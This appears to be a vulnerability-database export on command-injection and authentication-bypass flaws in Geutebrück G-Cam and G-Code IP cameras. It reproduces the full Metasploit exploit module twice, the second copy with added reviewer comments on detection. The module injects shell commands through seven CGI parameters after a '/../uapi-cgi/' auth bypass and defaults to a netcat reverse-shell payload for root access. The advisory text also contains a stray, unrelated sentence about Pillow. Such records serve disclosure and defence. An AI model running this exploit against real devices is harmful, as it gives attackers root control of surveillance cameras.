        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may include the following. * A remote third party steals confidential information due to improper default user authentication settings - CVE-2021-33543 * A remote third party executes arbitrary code through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33550",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "id": "VAR-202109-0859",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T22:27:30.399000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Repair measures for the command injection vulnerability in multiple Geutebr\u00fcck camera devices",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158067"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.040000",
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:51.920000",
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0857

    Vulnerability from variot - Updated: 2025-01-30 22:14

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following vulnerabilities exist in the G-Cam E2 and G-Code products provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows. * A remote third party may steal confidential information due to improper default user authentication settings - CVE-2021-33543 * A remote third party may execute arbitrary code through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * A remote third party may trigger a buffer overflow in the counter parameter and execute arbitrary code - CVE-2021-33545 * A remote third party may trigger a buffer overflow in the name parameter and execute arbitrary code - CVE-2021-33546 * A remote third party may trigger a buffer overflow in the profile parameter and execute arbitrary code - CVE-2021-33547 * A remote third party may trigger a buffer overflow in the action parameter and execute arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit module covering the Geutebruck G-Cam / G-Code command-injection
    # CVEs listed under 'References'.
    #
    # Reviewer notes, limited to what the code below shows:
    # * Every target URI begins with '/../uapi-cgi/'. The module description says
    #   HTTP basic authentication on /uapi-cgi/ is bypassed, so that path prefix
    #   in camera or reverse-proxy logs is a practical detection signal.
    # * Six of the seven targets wrap the command in '$(...)' inside a GET
    #   parameter; testcmd.cgi takes the command directly. Presumably these
    #   parameters reach a shell unsanitised on the device.
    # * #check only reads /brand.xml and compares the reported firmware version
    #   (<= 1.12.0.27, 1.12.13.2 or 1.12.14.5); it sends no injection request.
    # * Remediation guidance is in the CISA advisory referenced below
    #   (icsa-21-208-03).
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      prepend Msf::Exploit::Remote::AutoCheck

      # Registers the module metadata (name, authors, references, targets,
      # default payload and stability notes) with the framework.
      #
      # @param info [Hash] metadata passed in by the framework, merged via update_info
      def initialize(info = {})
        # One entry per CGI page. Each PLACEHOLDER_CMD literal stays a separate
        # String object because #exploit rewrites the selected target's values
        # in place.
        cgi_targets = [
          [
            'CVE-2021-33544 - certmngr.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi',
            {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ]

        super(
          update_info(
            info,
            'Name' => 'Geutebruck Multiple Remote Command Execution',
            'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
            'Author' => [
              'Titouan Lazard', # Of RandoriSec - Discovery
              'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
              'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2021-33543'],
              ['CVE', '2021-33544'],
              ['CVE', '2021-33548'],
              ['CVE', '2021-33550'],
              ['CVE', '2021-33551'],
              ['CVE', '2021-33552'],
              ['CVE', '2021-33553'],
              ['CVE', '2021-33554'],
              [ 'URL', 'http://geutebruck.com' ],
              [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
              [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
            ],
            'DisclosureDate' => '2021-07-08',
            'Privileged' => true,
            'Platform' => ['unix', 'linux'],
            'Arch' => [ARCH_CMD],
            'Targets' => cgi_targets,
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            },
            'Notes' => {
              'Stability' => ['CRASH_SAFE'],
              'Reliability' => ['REPEATABLE_SESSION'],
              'SideEffects' => ['ARTIFACTS_ON_DISK']
            }
          )
        )
      end

      # Requests /brand.xml and extracts the firmware version it reports.
      #
      # @return [String, false] the first d.d{1,3}.d{1,3}.d{1,3} match found in
      #   the <firmware> element, or false (after printing an error) when the
      #   request fails, the body is empty, the element is missing, or its text
      #   holds no such version string
      def firmware
        response = send_request_cgi('method' => 'GET', 'uri' => '/brand.xml')
        unless response
          print_error('Connection failed!')
          return false
        end

        if !response.body || response.body.empty?
          print_error('Empty body in the response!')
          return false
        end

        firmware_node = response.get_xml_document.at('//firmware')
        if firmware_node.nil?
          print_error('Target did not respond with a XML document containing the "firmware" element!')
          return false
        end

        raw_text = firmware_node.text
        version_match = raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
        return version_match[0] if version_match

        print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
        false
      end

      # Version-only check: compares the firmware reported by /brand.xml with
      # the affected versions. The result depends entirely on what the device
      # reports about itself.
      #
      # @return [CheckCode] Unknown when no version could be read, Appears for
      #   versions <= 1.12.0.27 or exactly 1.12.13.2 / 1.12.14.5, otherwise Safe
      def check
        version = firmware
        if version == false
          return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
        end

        found = Rex::Version.new(version)
        vprint_status("Found Geutebruck version #{found}")

        within_range = found <= Rex::Version.new('1.12.0.27')
        listed_build = ['1.12.13.2', '1.12.14.5'].any? { |affected| found == Rex::Version.new(affected) }
        return CheckCode::Appears if within_range || listed_build

        CheckCode::Safe
      end

      # Substitutes the encoded payload for PLACEHOLDER_CMD in the selected
      # target's parameters and sends a single request to the target URI.
      # The target's parameter strings are modified in place, and the HTTP
      # response is not inspected.
      def exploit
        print_status("#{rhost}:#{rport} - Setting up request...")

        method = target['http_method']
        http_method_vars = method == 'GET' ? 'vars_get' : 'vars_post'

        http_vars = target['http_vars']
        http_vars.each do |key, value|
          next unless value.include?('PLACEHOLDER_CMD')

          http_vars[key]['PLACEHOLDER_CMD'] = payload.encoded
        end

        print_status("Sending CMD injection request to #{rhost}:#{rport}")
        request_opts = {
          'method' => method,
          'uri' => target['uri'],
          http_method_vars => http_vars
        }
        send_request_cgi(request_opts)
        print_status('Exploit complete, you should get a shell as the root user!')
      end
    end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
